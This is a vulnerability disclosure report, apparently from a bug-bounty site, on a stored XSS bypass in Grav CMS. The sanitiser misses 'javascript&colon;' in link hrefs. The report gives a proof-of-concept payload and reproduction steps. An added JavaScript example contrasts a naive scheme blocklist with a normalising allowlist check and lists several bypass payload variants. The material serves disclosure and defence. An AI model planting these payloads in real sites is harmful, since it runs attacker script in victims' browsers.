Cross-site Scripting (XSS) - Stored in getgrav/grav


Reported on Oct 20th 2021


Grav is vulnerable to stored XSS. Its sanitiser blocks javascript: URLs in <a> tags, but it does not recognise the HTML entity &colon; as a substitute for the literal colon. The browser decodes the entity when it parses the href attribute, so a stored value of javascript&colon;... is rendered, and executed on click, as javascript:...

Proof of Concept


<a href="javascript&colon;alert(document.domain)">CLICK HERE</a>

1: As a user with low privileges, edit a page and insert the payload above into its content.

2: Open the target page and click on CLICK HERE; the alert shows the site's domain, proving script execution in the site's origin.

PoC video.


Impact: the stored payload executes attacker-controlled JavaScript in the origin of the Grav site, in the browser of any user who views the page and clicks the link. Because a low-privileged editor can store it, it can be used against higher-privileged users who view that page.
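The following is an added example, written for this page; it is not Grav's code and not the Security.php fix referenced in the timeline. It shows, in Node-runnable JavaScript, why a scheme check applied to the raw attribute value misses javascript&colon;, and what a check that normalises the href the way a browser does (decode character references, strip tab/newline/CR and leading controls, then look at the scheme) catches instead. The entity table, the function names and every payload beyond the report's own are assumptions of this example; it also goes beyond the report by covering numeric references and whitespace variants.

```javascript
// Added example (not Grav's code and not the Security.php fix): why
// "javascript&colon;" slips past a scheme check on the raw attribute, and a
// check that normalises the href the way a browser does before deciding.

// Small named-entity table (an assumption for this example; a real sanitiser
// needs the full HTML5 table). &colon;, &Tab; and &NewLine; are HTML5
// additions, which is why entity lists built from HTML 4 omit them.
const NAMED_ENTITIES = {
  colon: ':', Tab: '\t', NewLine: '\n',
  amp: '&', lt: '<', gt: '>', quot: '"', apos: "'",
};

// Decode numeric (&#58; &#x3A;) and named (&colon;) character references.
// Named lookups are case-sensitive, as in HTML (&colon; is ':', &Colon; is not).
function decodeEntities(s) {
  return s.replace(/&(#[xX][0-9a-fA-F]+|#\d+|[a-zA-Z]+);?/g, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1] === 'x' || body[1] === 'X';
      const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    return Object.prototype.hasOwnProperty.call(NAMED_ENTITIES, body)
      ? NAMED_ENTITIES[body]
      : match;
  });
}

// Approximate the URL parser's pre-processing: strip ASCII tab/newline/CR
// anywhere, strip leading C0 controls and spaces, then lower-case.
function normalizeHref(href) {
  return decodeEntities(href)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\u0000-\u0020]+/, '')
    .toLowerCase();
}

// The naive check: a blocklist applied to the raw attribute value.
const BLOCKED_SCHEMES = ['javascript:', 'vbscript:', 'data:'];
function naiveHrefIsSafe(href) {
  const h = href.toLowerCase();
  return !BLOCKED_SCHEMES.some((s) => h.startsWith(s));
}

// The hardened check: normalise first, then allow only known-safe schemes
// (or scheme-less, relative URLs). Allowlisting avoids the next bypass.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto', 'tel']);
function hrefIsSafe(href) {
  const h = normalizeHref(href);
  const m = /^([a-z][a-z0-9+.-]*):/.exec(h);
  if (m === null) return true; // no scheme: relative URL
  return ALLOWED_SCHEMES.has(m[1]);
}

// Constructed inputs. The first is the report's payload; the rest are the
// usual variants a normalising check must also catch, plus two benign URLs.
const PAYLOADS = [
  'javascript&colon;alert(document.domain)',
  'javascript&#58;alert(1)',
  '&#x6A;avascript:alert(1)',
  'java\tscript:alert(1)',
  ' javascript:alert(1)',
  'https://example.com/page',
  '/user/pages/01.home',
];

function compare(href) {
  return { href, naive: naiveHrefIsSafe(href), hardened: hrefIsSafe(href) };
}

console.table(PAYLOADS.map(compare));
```

The point the table makes is that every hostile input passes the naive check and fails the hardened one, while the two benign URLs pass both. The same principle applies to a PHP sanitiser such as Grav's: decode references with the HTML5 table (in PHP, html_entity_decode with ENT_HTML5) and strip the characters the URL parser ignores before the scheme is inspected, and prefer an allowlist of schemes over a blocklist of bad ones.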

Timeline

We have contacted a member of the getgrav/grav team and are waiting to hear back.
We have sent a follow up to the getgrav/grav team. We will try again in 7 days.
getgrav/grav maintainer validated this vulnerability.
Renan Rocha has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
getgrav/grav maintainer confirmed that a fix has been merged on afc69a.
The fix bounty has been dropped.
Security.php#L82-L125 has been validated (Jamie Slome).


CVE published! 🎉
